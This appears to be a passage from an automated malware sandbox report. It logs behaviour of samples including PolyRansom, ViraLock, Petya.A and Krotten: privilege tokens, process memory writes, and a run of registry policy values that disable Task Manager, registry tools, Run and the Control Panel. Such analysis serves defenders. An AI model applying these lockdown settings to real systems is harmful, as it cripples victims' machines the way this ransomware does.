d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e DiscoverySrv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e DiscoverySrv.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
smi_gui.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exeProductAgentService.exechrome.exechrome.exechrome.exeInstaller.exechrome.exechrome.exechrome.exechrome.exeEndermanch@PolyRansom.exeEndermanch@ViraLock.exepid process 2380 smi_gui.exe 3644 chrome.exe 3644 chrome.exe 1160 chrome.exe 1160 chrome.exe 4088 chrome.exe 4088 chrome.exe 1592 chrome.exe 1592 chrome.exe 3508 chrome.exe 3508 chrome.exe 952 chrome.exe 952 chrome.exe 4128 chrome.exe 4128 chrome.exe 1640 chrome.exe 1640 chrome.exe 3744 chrome.exe 3744 chrome.exe 1368 chrome.exe 1368 chrome.exe 696 chrome.exe 696 chrome.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 2328 chrome.exe 2328 chrome.exe 1976 chrome.exe 1976 chrome.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4312 chrome.exe 4312 chrome.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 3504 Installer.exe 3504 Installer.exe 3504 Installer.exe 3504 Installer.exe 3504 Installer.exe 3504 Installer.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 768 chrome.exe 768 chrome.exe 640 chrome.exe 640 chrome.exe 1048 chrome.exe 1048 chrome.exe 2484 chrome.exe 2484 chrome.exe 3728 Endermanch@PolyRansom.exe 3728 Endermanch@PolyRansom.exe 820 Endermanch@ViraLock.exe 820 Endermanch@ViraLock.exe 820 Endermanch@ViraLock.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
WinRAR.exepid process 4712 WinRAR.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
fltmc.exeInstaller.exepid process 3124 fltmc.exe 3504 Installer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 31 IoCs
Processes:
chrome.exechrome.exepid process 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Processes:
smi_gui.exeinstaller.exeProductAgentService.exeInstaller.exesvchost.exefltmc.exefltmc.exeEndermanch@Krotten.exesys3.exeFantom.exerundll32.exemsiexec.exeEndermanch@DeriaLock.exedescription pid process Token: SeDebugPrivilege 2380 smi_gui.exe Token: SeDebugPrivilege 4952 installer.exe Token: 35 4952 installer.exe Token: 35 4952 installer.exe Token: 35 4952 installer.exe Token: SeRestorePrivilege 4952 installer.exe Token: SeDebugPrivilege 4440 ProductAgentService.exe Token: SeDebugPrivilege 4440 ProductAgentService.exe Token: SeDebugPrivilege 4440 ProductAgentService.exe Token: SeDebugPrivilege 4440 ProductAgentService.exe Token: SeDebugPrivilege 3504 Installer.exe Token: SeSecurityPrivilege 3504 Installer.exe Token: SeAuditPrivilege 3064 svchost.exe Token: SeSecurityPrivilege 3064 svchost.exe Token: SeLoadDriverPrivilege 3124 fltmc.exe Token: SeDebugPrivilege 3504 Installer.exe Token: SeLoadDriverPrivilege 3504 Installer.exe Token: SeLoadDriverPrivilege 2716 fltmc.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeBackupPrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeBackupPrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeSystemtimePrivilege 4424 Endermanch@Krotten.exe Token: SeShutdownPrivilege 180 sys3.exe Token: SeDebugPrivilege 1432 Fantom.exe Token: SeShutdownPrivilege 5100 rundll32.exe Token: SeDebugPrivilege 5100 rundll32.exe Token: SeTcbPrivilege 5100 rundll32.exe Token: SeSecurityPrivilege 1576 msiexec.exe Token: SeDebugPrivilege 3496 Endermanch@DeriaLock.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
chrome.exepid process 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe -
Suspicious use of SendNotifyMessage 48 IoCs
Processes:
chrome.exechrome.exepid process 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe -
Suspicious use of SetWindowsHookEx 15 IoCs
Processes:
winrar-x64-611.exeinstaller.exeWinRAR.exeinstaller.exeInstaller.exeProductAgentUI.exeEndermanch@Petya.A.exeLogonUI.exepid process 3728 winrar-x64-611.exe 3728 winrar-x64-611.exe 4952 installer.exe 4712 WinRAR.exe 4712 WinRAR.exe 4484 installer.exe 3504 Installer.exe 3504 Installer.exe 3504 Installer.exe 4268 ProductAgentUI.exe 3504 Installer.exe 3504 Installer.exe 3084 Endermanch@Petya.A.exe 2372 LogonUI.exe 2372 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 1160 wrote to memory of 332 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 332 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3644 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3644 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe -
System policy modification 1 TTPs 37 IoCs
Processes:
Endermanch@Krotten.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyPictures = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMyMusic = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoThemesTab = "1" Endermanch@Krotten.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinters = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList = "1" Endermanch@Krotten.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoUserNameInStartMenu = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D} = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoToolbarCustomize = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoManageMyComputerVerb = "1" Endermanch@Krotten.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{450D8FBA-AD25-11D0-98A8-0800361B1103} = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall\NoAddRemovePrograms = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "1044" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinterTabs = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyDocs = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL = "1" Endermanch@Krotten.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\smi_gui.exe"C:\Users\Admin\AppData\Local\Temp\smi_gui.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe95074f50,0x7ffe95074f60,0x7ffe95074f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1664 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1852 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2292 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3028 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4560 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4644 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4576 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4880 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4832 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe" --reenable-autoupdates --system-level2⤵
-
